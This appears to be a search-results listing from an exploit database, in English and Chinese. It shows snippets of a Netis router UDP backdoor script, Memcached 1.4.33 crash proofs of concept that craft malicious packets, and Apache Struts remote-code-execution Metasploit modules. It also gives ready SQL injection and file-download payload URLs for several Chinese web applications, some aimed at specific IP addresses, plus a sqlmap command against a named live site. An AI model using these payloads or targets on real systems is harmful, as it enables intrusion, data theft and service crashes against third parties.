117 matches found
Netcore / Netis Routers - UDP Backdoor Access
!/usr/bin/python -- coding: utf8 -- NETCORE / NETDIS UDP 53413 BACKDOOR https://netisscan.shadowserver.org/ http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/ https://www.seebug.org/vuldb/ssvid-90227 import socket import struct import logging...
Microsoft Windows Internet Explorer the animation Manager memory corruption vulnerability (MS16-132)
Exploitation Exploitation of this vulnerability requires a user to visit a page containing specially crafted JavaScript. Users can generally be lured to visit web pages via email, instant message or links on the internet. Vulnerabilities like thisare often hosted on legitimate websites which have...
Memcached 1.4.33 - PoC (2)
Exploit for linux platform in category dos / poc Source: http://paper.seebug.org/95/ import struct import socket import sys MEMCACHEDREQUESTMAGIC = "\x80" OPCODEADD = "\x02" keylen = struct.pack"!H",0xfa extralen = "\x08" datatype = "\x00" vbucket = "\x00\x00" bodylen = struct.pack"!I",0xffffffd0...
Memcached 1.4.33 - PoC (1)
Exploit for linux platform in category dos / poc Source: http://paper.seebug.org/95/ import struct import socket import sys MEMCACHEDREQUESTMAGIC = "\x80" OPCODEPREPENDQ = "\x1a" keylen = struct.pack"!H",0xfa extralen = "\x00" datatype = "\x00" vbucket = "\x00\x00" bodylen = struct.pack"!I",0...
Memcached 1.4.33 - PoC (3)
Exploit for linux platform in category dos / poc Source: http://paper.seebug.org/95/ import struct import socket import sys MEMCACHEDREQUESTMAGIC = "\x80" OPCODESET = "\x21" keylen = struct.pack"!H",32 bodylen = struct.pack"!I",1 packet = MEMCACHEDREQUESTMAGIC + OPCODESET + keylen + bodylen2 +...
Memcached 1.4.33 - 'Crash' (PoC)
Source: http://paper.seebug.org/95/ import struct import socket import sys MEMCACHEDREQUESTMAGIC = "\x80" OPCODEPREPENDQ = "\x1a" keylen = struct.pack"!H",0xfa extralen = "\x00" datatype = "\x00" vbucket = "\x00\x00" bodylen = struct.pack"!I",0 opaque = struct.pack"!I",0 CAS = struct.pack"!Q",0...
Pocsuite - Remote Vulnerability Testing Framework Developed By The Knownsec Security Team
Pocsuite is an open-sourced remote vulnerability testing and PoC development framework developed by the Knownsec Security Team. It serves as the cornerstone of the team. You can use Pocsuite to verify and exploit vulnerabilities or write PoC/Exp based on it. You can also integrate Pocsuite in you...
Shanghai Zhuo fan cms government service center/index/downLoadFile. action download vulnerability
http://xxx.com/index/downLoadFile.action?fileName=web.xml&filePath=WEB-INF/web.xml...
Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution
This module exploits a remote command execution vulnerability in Apache Struts version between 2.3.20 and 2.3.28 except 2.3.20.2 and 2.3.24.2. Remote Code Execution can be performed when using REST Plugin with ! operator when Dynamic Method Invocation is enabled. This module requires Metasploit:...
金蝶某系统存在远程命令执行
简要描述: 金蝶某系统存在远程命令执行 详细说明: http://118.194.40.105/ 为discuz,且服务器存在redis服务,通过ssrf WooYun: Discuz!另一处SSRF无须登陆无须条件 可以更改discuz缓存代码,从而实现远程命令执行。 设置 还原 漏洞证明:...
Remote Vulnerability Testing Framework: Pocsuite
Pocsuite is an open-sourced remote vulnerability testing and proof-of-concept development framework developed by the Knownsec Security Team. It comes with a powerful proof-of-concept engine, many niche features for the ultimate penetration testers and security researchers. Requirements Python 2.6...
1caitong电子采购系统 CheckUser.asp 参数USERNAME SQL注入漏洞
0x01漏洞简介 北京网达信联科技发展有限公司http://www.1caitong.com研发的1caitong电子采购系统在/rat/Supplier/CheckUser.asp对参数USERNAME过滤不严格,导致出现SQL注入漏洞。远程攻击者可以利用该漏洞执行SQL指令。 0x02漏洞利用 http://.com/rat/Supplier/CheckUser.asp?USERNAME=' and @@version=0-- 0x03修复方案 过滤。或者采用参数化的SQL语句。...
Apache Struts 2.3.28 Dynamic Method Invocation Remote Code Execution
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'Apache Struts Dynamic Method Invocation Remote Code Execution', 'Description' = %q This module exploits a remote command...
远古流媒体系统 query_user_password_qustion.aspx SQL 注入漏洞
/viewgood/webmedia/portal/queryuserpasswordqustion.aspx?username=1%27%20AND%201%3DCONVERT%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2b@@version%2b%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29%20AND%20%271%27%3D%271...
远古流媒体系统 pic_proxy.aspx SQL 注入漏洞
/viewgood/webmedia/portal/picproxy.aspx?id=1%20and%201%3Dconvert%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2bdbname%2b%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29--&type=2...
用友GRP系统sql 注入漏洞
用友GRP系统sql注射 /R9iPortal/cm/cminfocontent.jsp 参数 infoid http://221.2.68.102:8888/R9iPortal/cm/cminfocontent.jsp?infoid=-8431%20UNION%20ALL%20SELECT%2067,67,user,67,67,67,67,67,67,67,67,67,67,67--...
中软政务系统Technological.aspx 参数id SQL注入漏洞
SQL Injection: /ExtendForm/Down/Technological.aspx?id=1 不过使用的数据库功能有限,没有什么核心内容。...
4a网络教学平台relatedMaterial.jsp resId参数SQL注入漏洞
4a网络教学平台relatedMaterial.jsp resId参数SQL注入漏洞 relatedMaterial.jsp中的resid参数存在注入 可以用sqlmap直接跑。 这个是正常的。 这个是不正常的。我也是醉了。...
jeecms V2.4.2 ArtiSearch.do 远程命令执行漏洞
0x01 框架概述 江西金磊科技发展有限公司(以下简称金磊科技)成立于2003年,旗下产品JEECMS内容管理系统是国内java开源CMS行业知名度最高、用户量最大的站群管理系统。金磊科技是一家专注java WEB应用软件研发高新技术企业。Jeecms是基于java技术研发的站群管理系统,稳定、安全、高效、跨平台、 无限扩展是jeecms 的优点,系统支持mysql、oracle、sqlserver、db2等主流 数据库。 主页:http://www.jeecms.com 0x02 漏洞细节 谷歌搜索:inurl:jeecms/ArtiSearch.do 涉及大量案例 漏洞证明:...
joomla com_Nice Ajax Poll 1.4.0 组件SQL注入漏洞
1.google 语法: inurl:"/index.php?option=comniceajaxpoll" 2.随便打开一个网站,利用sqlmap 进行注入. sqlmap.py -u "http://www.cevosop.com/index.php?option=comniceajaxpoll&getpliseid=" --current-user...